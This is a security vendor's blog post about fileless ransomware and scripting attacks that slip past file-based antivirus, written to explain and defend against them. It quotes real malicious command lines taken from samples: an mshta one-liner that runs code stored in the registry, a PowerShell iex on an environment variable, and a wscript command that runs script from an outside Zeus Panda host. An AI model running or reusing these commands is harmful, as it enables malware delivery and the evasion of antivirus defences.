Fileless infections – Ransomware’s latest trick

If one thought May 2017’s WannaCry ransomware scare was bad, it’s just the beginning. Each year, as more ransoms are paid, the cybercriminals have more capital to invest in new technologies and techniques. One of their most promising techniques is fileless infections or scripting attacks.

Historically, malware and now ransomware sneaked a program onto a computer, and then either overtly or covertly attempted the execution of said file. The common thread in these attacks is that a file is downloaded and then attempts to execute. The architecture of antivirus software employs a file system driver. This driver traps the file and then determines whether it can execute.

A fileless malware does not drop a file and bypasses the file system driver of mainstream AV. Instead, scripts are written and executed through known good script engines such as Powershell, MSHTA, Cscript and Wscript. Show and tell time.

C:\WINDOWS\system32\mshta.exe “javascript:QNm90c=”8YNUG”;
S07R=new ActiveXObject(“WScript.Shell”); e91eHqEE=”l”; l21MJb=S07R.RegRead (“HKCU\\software\\lfxqiypm\\qkkqsiqrqk”); g0dn1w=”jSJKZ”; eval(l21MJb); GQEXz2t=”apyD”;”

The above command invokes MSHTA which is a known good commonly used Microsoft application. The command calls Javascipt which in turn calls Wscript to execute a script from a registry key named with random characters. Since the script resides in a registry key, there is no file for the file system driver to analyze.

“C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe” iex $env:kuihcdc

The above command instructs Powershell, another valid Microsoft scripting engine, to execute a script from an environment variable named with random characters. Since the script resides in a environment variable rather than a file, the file system driver has zero visibility on this type of activity.

wscript //B //E:JScript OTTYUADAF “gexywoaxor” “http://hit.thincoachmd.com/?oq=hpKckf7tVaATgjxCHeAFpyI4PUA8X_qyqiEnVmhDPg5_U_kDbMAl19pucJOw6mF4&es_sm=140&

The command above runs Wscript, another valid Microsoft scripting engine, and then switches to Javascript and runs the script directly from a web site with a gnarly query string. Let’s think about this. The above command is instructing wscript to execute code straight from a foreign web site without a file hitting the file system driver.
If one does a search on the strange string “gexywoaxor”, one learns that this malware is a banking trojan called Zeus Panda discovered by Forcepoint.
The article is dated July 2016, and PC Matic blocked the sample in November 2016, 4 months later.

Forcepoint Sample PC Matic Sample
Date Jul 2016 Nov 2016
Scripting Engine Wscript Wscript
Script File Name r3ak.tmp OTTYUADAF
Encryption Key gexywoaxor gexywoaxor
URL ytbuybytvtrcevrtbyybyttvrcrvbyynubyvrvgh hit.thincoachmd.com

In those four months, there were noticeable changes in the attack method, yet the critical encryption key “gexywoaxor” remained unchanged. The fact that a new encryption key was not required, is a sign that this virus was successful in delivering its payload.

Scripting attacks or fileless infections are here today. 25% of all the malware PC Matic blocks is at the script level. In fairness, in today’s environment, frequently, a scripting attack involves dropping a file later to be executed. In that instance, there is a second point at which a file system driver / black list approach can catch and block the intrusion. The problem is that not all scripting attacks drop a file, and that represents a security hole in your company’s antivirus.

Want to get monthly tips & tricks?

Subscribe to our newsletter to get cybersecurity tips & tricks and stay up to date with the constantly evolving world of cybersecurity.

Related Articles